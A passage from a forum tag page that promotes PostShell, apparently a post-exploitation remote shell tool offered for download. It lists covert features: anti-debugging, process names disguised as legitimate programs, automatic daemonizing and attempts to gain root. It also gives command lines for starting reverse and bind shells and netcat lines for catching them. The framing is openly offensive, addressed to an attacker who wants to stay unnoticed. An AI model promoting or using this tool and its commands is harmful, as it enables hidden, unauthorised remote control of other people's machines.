Search the Community
Showing results for tags 'postshell'.
-
PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control. The stub size is around 14kb and can be compiled on any Unix like system. Why not use a traditional Backconnect/Bind Shell? PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl. It also incorporates both a back connect and bind shell, meaning that if a target doesn’t allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely. PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked. Features Anti-Debugging, if ptrace is detected as being attached to the shell it will exit. Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program. TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH. Bind/Backconnect shell, both a bind shell and back connect can be created. Small Stub Size, a very small stub(<14kb) is usually generated. Automatically Daemonizes Tries to set GUID/UID to 0 (root) Example Usage Backconnect: ./stub 127.0.0.1 13377 Bind Shell: ./stub 13377 Recieving a Connection with Netcat Recieving a backconnect: nc -vlp port Connecting to a bind Shell: nc host port Download [Hidden Content]